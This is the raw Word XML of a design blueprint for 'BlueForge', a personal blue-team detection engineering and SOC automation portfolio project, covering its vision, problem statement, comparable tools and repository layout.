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lueforge-master-blueprint"/>
      <w:r>
        <w:t xml:space="preserve">BlueForge Master Blueprint</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Engineering and SOC Automation Platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dual-stack: Wazuh (open source SIEM) + Microsoft Sentinel / Defender XDR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Author: Ravi (Ontario, Canada). Repository:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blueforge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(private).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Purpose: a portfolio-grade blue-team platform to build gradually, showcase on GitHub, put on a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">resume, and discuss confidently in interviews. Optimized for understanding, explainability,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">demonstrable security skill, and clean presentation, not for feature count or complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This master document consolidates the twelve design sections. Each also exists as its own file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for focused reading. Where a section references diagrams, the Mermaid sources live in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">diagrams/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Project Foundation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Repository Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technology Stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Development Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First 30 Days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Documentation Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection Engineering Plan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python Software Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHub Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Career Application Material</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senior Engineer Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supporting documents: Installation Guide (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">installation.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), Threat Model (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">threat-model.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Detection Authoring Guide (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detection-guide.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and templates in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X7f3a2618b70227b9a14dbf942cf4e3c4af55976"/>
      <w:r>
        <w:t xml:space="preserve">01. Project Foundation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="name"/>
      <w:r>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BlueForge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(repository:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blueforge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Blue" for blue team (defense). "Forge" because the project is about</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">building</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detections,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">not just consuming them. The name reads like an internal enterprise security tool, which is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the positioning: BlueForge is the kind of platform a small SOC builds in-house to glue their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SIEM, detection content, and automation together.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="vision"/>
      <w:r>
        <w:t xml:space="preserve">Vision</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A single, understandable platform that takes raw security logs and turns them into detections,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alerts, investigations, and reports the way a real SOC does, built and operated by one analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">who can explain every line of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="mission"/>
      <w:r>
        <w:t xml:space="preserve">Mission</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Give a transitioning analyst (Ravi) a working, growable environment to practice the full</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detection engineering loop: collect, normalize, detect, enrich, hunt, report, and measure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">coverage against MITRE ATT&amp;CK, using both an open-source SIEM (Wazuh) and the Microsoft stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Sentinel / Defender XDR / KQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="problem-statement"/>
      <w:r>
        <w:t xml:space="preserve">Problem statement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most junior candidates can talk about tools but cannot show the loop that connects them. They</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have watched a Wazuh install video and written one Sigma rule, but they cannot answer "what</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">happens between a log line arriving and an analyst deciding it is an incident?" BlueForge exists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to make that loop concrete, versioned, and demonstrable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Concretely, it solves four gaps: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Format chaos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows, Sysmon, Linux, and Wazuh all describe the same events with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">different field names. Without normalization, every detection is tied to one log format.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Detection sprawl.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rules get written in an ad-hoc way with no IDs, no MITRE mapping, no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tests, and no record of false positives. BlueForge treats detections as versioned code.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Manual triage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pulling IOCs out of an alert, looking them up, and writing a report is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">repetitive. That is exactly what automation should own.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coverage story.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"How good is your detection coverage?" is unanswerable without a way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to map rules to ATT&amp;CK. BlueForge produces a coverage count from the rules themselves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="target-users"/>
      <w:r>
        <w:t xml:space="preserve">Target users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primarily the author, as a learning and portfolio platform. Secondarily, the archetype it is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">modeled on: a junior SOC analyst or detection engineer at a small-to-mid organization who owns</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detection content and light automation on top of an existing SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="X8bdf556f95e8f62880f751dba60e631e75c32e5"/>
      <w:r>
        <w:t xml:space="preserve">Why this project matters (for the career goal)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Canadian entry-level market (Toronto, Waterloo, Ottawa) is competitive and Microsoft-heavy.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Employers screen for people who can do the work, not just name the tools. BlueForge is evidence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of exactly the day-one skills a SOC wants: reading logs, writing and testing detections, mapping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to ATT&amp;CK, triaging with structure, and automating the boring parts. It also pairs directly with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the SC-200 certification through the Sentinel/KQL parity track.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="Xa47d7e553f661feda7e0d57079d9bf4c4c09a4b"/>
      <w:r>
        <w:t xml:space="preserve">Similar industry tools (and where BlueForge sits)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BlueForge is not trying to replace these; it borrows their good ideas at a scale one person can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">own and explain.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BlueForge borrows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Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Open-source SIEM/XDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Log collection, agent model, rule + MITRE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Sigma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generic detection rule format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The rule structure and the "write once" philosophy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 Sentinel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cloud SIEM with KQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Analytics rules, ASIM-style normalization, automation playbooks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Elastic / ELK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Search + detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common schema idea (ECS)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TheHive / Cortex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Case management + enrichment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enrichment and report generation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Atomic Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attack simulation library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Safe, documented attack tests to generate telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="what-makes-blueforge-different"/>
      <w:r>
        <w:t xml:space="preserve">What makes BlueForge different</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is deliberately small enough for one person to understand end to end, but structured like real</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">software: a normalized schema, versioned detections with tests and MITRE mappings, a documented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mini detection engine (so nothing is a black box), automation for triage, and dual-stack parity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">between open-source (Wazuh) and Microsoft (Sentinel/KQL). The optimization target is not feature</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">count. It is understanding, explainability, demonstrable skill, and a clean GitHub presence.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X5a8ac0a8597f9e2531d1e38a96942de0d308c1a"/>
      <w:r>
        <w:t xml:space="preserve">02. Repository Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The layout follows conventions a reviewer expects from a professional open-source security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">project, so it reads as credible at a glance. Every folder has one job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">blueforge/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  README.md                 Front door: what, why, quickstart, architecture summary</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  LICENSE                   MIT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  SECURITY.md               Responsible-use policy for detection/offensive content</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONTRIBUTING.md           Workflow, commit convention, how to add a detection</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CODE_OF_CONDUCT.md        Standard conduct statement</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CHANGELOG.md              Keep a Changelog format, SemVer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Makefile                  make install / lint / test / run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  pyproject.toml            Package metadata, ruff/mypy/pytest config, CLI entry point</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  requirements.txt          Runtime deps (intentionally small)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  requirements-dev.txt      Dev/test/lint deps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  .env.example              Documented env vars; copy to .env (never committed)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  .gitignore                Excludes secrets, raw logs, caches</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  .pre-commit-config.yaml   Lint/format/secret-scan before every commit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  .github/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    workflows/ci.yml        Lint + type-check + test on push/PR; validate detections</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ISSUE_TEMPLATE/         bug, feature, and new-detection templates</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    PULL_REQUEST_TEMPLATE.md</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    labels.yml              Label taxonomy (type/area/phase)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  src/blueforge/            The Python package (see docs/09)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    schema.py               The common Event model (the platform contract)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    config.py               Env-based configuration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    logging_config.py       Central logging</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    cli.py                  Command line interface (the glue)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    collectors/             Acquire raw logs (sample file, later evtx/syslog/wazuh-api)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    normalizer/             Map raw formats -&gt; Event</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    detections/             The Sigma-style detection engine</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    enrichment/             IOC extraction + threat intel lookups</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    reporting/              Incident report generation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    utils/                  Small shared helpers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  detections/               Detection CONTENT (data, not code)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    sigma/                  Vendor-neutral rules (bf-000N.yml) + README</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    wazuh/                  local_rules.xml for the Wazuh manager</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    sentinel/               KQL analytics rules for the Microsoft stack</w:t>
      </w:r>
